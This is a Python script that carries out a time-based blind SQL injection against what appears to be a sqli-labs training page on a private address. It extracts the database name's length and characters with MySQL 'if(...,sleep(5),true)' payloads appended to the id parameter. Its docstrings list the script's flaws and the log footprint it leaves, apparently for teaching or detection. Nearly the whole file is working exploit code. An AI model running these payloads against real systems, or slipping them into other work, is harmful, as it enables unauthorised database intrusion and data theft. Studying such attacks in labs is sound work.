import requests

# Base request for the lab page under test (private 192.168.x.x address, plain HTTP).
# The probe strings built in time_sqli() are appended directly after the id value.
url = "http://192.168.10.135/sql-lab/Less-8/?id=1"

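def timeout(url):
	"""Fetch *url* with a 3-second limit and return the response body.

	Returns the literal string "sorry_timeout" when the request fails.
	The sentinel is produced for every ``requests`` failure (connection
	error, read timeout, ...), not only for a slow response, so callers
	cannot tell a delayed reply from an unreachable host. Callers test it
	with ``in``, so a page body containing that text would also match.
	"""
	try:
		response = requests.get(url, timeout=3)
		return response.text
	# Catch only request-level failures: a bare ``except`` also swallowed
	# KeyboardInterrupt/SystemExit, so Ctrl-C during a request was counted
	# as a timeout and the caller's loop kept running.
	except requests.exceptions.RequestException:
		return "sorry_timeout"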

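# Step 1 (first loop in time_sqli below): use the response-time side channel to find the length of the database name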


def time_sqli():
	"""Recover the current database name through a response-time side channel.

	Each probe appends a condition to the module-level ``url`` that makes the
	server sleep 5 seconds when the guess is right; ``timeout()`` gives up
	after 3 seconds, so its "sorry_timeout" sentinel is read as "guess was
	correct". Progress and the final name are printed; nothing is returned.

	Limits visible in the code:
	- Neither search loop has an upper bound, so a probe that never delays
	  keeps the loop running.
	- Character guesses start at code point 97, so only values >= 97 can match.
	- timeout() returns the same sentinel for request failures, so an
	  unreachable host reads as a match.

	Log footprint: a run of sequential GET requests whose ``id`` parameter
	contains ``if(`` / ``sleep(5)``, each matching one aborted by the client
	at about 3 seconds.
	"""
	# Step 1: find the length of the database name.
	name_len = 1
	while True:
		print(f"正在测试长度：{name_len}")
		probe = url + f"' and if(length(database()) = {name_len},sleep(5),true)--+"
		if "sorry_timeout" not in timeout(probe):
			name_len += 1
			continue
		print(f"注入成功！数据库长度为：{name_len}")
		break

	# Step 2: recover the name one character position at a time.
	letters = []
	for pos in range(1, name_len + 1):
		code = 97
		while True:
			print(f"正在测试第{pos}个字母")
			probe = url + f"' and if(ascii(substr(database(),{pos},1)) = {code},sleep(5),true)--+"
			if "sorry_timeout" in timeout(probe):
				break
			code += 1
		ch = chr(code)
		print(f"注入成功！数据库名称的第{pos}个字母为{ch}")
		letters.append(ch)

	db_name = "".join(letters)
	print(f"sql注入成功，数据库的名称为：{db_name}")

# Run the probe sequence only when executed as a script, not on import.
if "__main__" == __name__:
	time_sqli()